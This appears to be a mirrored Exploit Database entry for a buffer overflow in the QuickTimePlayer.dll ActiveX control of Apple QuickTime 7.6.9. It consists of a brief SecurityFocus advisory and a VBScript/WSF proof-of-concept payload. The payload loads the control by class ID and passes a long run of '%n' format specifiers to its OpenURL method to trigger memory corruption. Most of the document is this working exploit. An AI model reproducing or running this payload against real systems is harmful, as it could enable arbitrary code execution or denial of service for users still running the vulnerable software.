Apple QuickTime 7.6.9 – ‘QuickTimePlayer.dll’ ActiveX Buffer Overflow

• Exploit Database
• 113 阅读

• 作者： Ivan Sanchez
  日期： 2011-09-06
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36115/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  source: https://www.securityfocus.com/bid/49465/info   Apple QuickTime is prone to a buffer-overflow vulnerability because of a failure to properly bounds-check user-supplied data.   Successful exploits will allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.   QuickTime 7.6.9 is vulnerable; other versions may also be affected.   <?XML version=&apos;1.0&apos; standalone=&apos;yes&apos; ?> <package><job id=&apos;DoneInVBS&apos; debug=&apos;false&apos; error=&apos;true&apos;> <object classid=&apos;clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3&apos; id=&apos;target&apos; /> <script language=&apos;vbscript&apos;> targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll" prototype= "Sub OpenURL ( ByVal url As String )" memberName = "OpenURL"progid = "QuickTimePlayerLib.QuickTimePlayer" argCount = 1 arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n" target.OpenURL arg1 </script> </job> </package>